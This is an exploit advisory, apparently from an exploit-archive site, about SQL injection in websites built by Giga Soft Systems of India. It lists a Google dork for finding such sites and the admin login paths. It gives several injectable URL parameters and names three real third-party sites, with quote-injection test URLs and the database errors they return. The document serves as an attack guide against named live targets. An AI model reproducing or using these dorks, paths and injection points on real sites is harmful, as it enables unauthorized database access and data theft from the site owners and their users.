#################################################################################################
# Exploit Title : Powered by Giga Soft Systems Pvt. Ltd. India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : gigasoft.in ~ gigasoftindia.in
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# GigaSoft, Business Technology Solutions, Website Design, Software Development in India
# Google Dork :
intext:''Powered by : Giga Soft Systems Pvt. Ltd.''
# Admin Control Panel Path =>
/templates/login.php
/student/templates/login.php
/student/templates/login.php?refer=/student/templates/dashboard.php?
# SQL Injection Exploit :
/student/templates/content.php?id=[SQL Injection]
/templates/career_news.php?startp=[SQL Injection]
/templates/newsroom.php?startp=[SQL Injection]
/templates/career_news.php?startp=[SQL Injection]
/jobs/recruit_details.php?jid=[SQL Injection]
#################################################################################################
# Example Vulnerable Sites =>
optionsindia.co.in/jobs/recruit_details.php?jid=39%27 => [ Proof of Concept ] => archive.is/iYceL
sanskritithegurukul.in/student/templates/content.php?id=57%27
mgmtonline.org/templates/career_news.php?startp=282%27
# SQL Database Error =>
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/optionsi/public_html/jobs/recruit_details.php on line 44
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''57''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################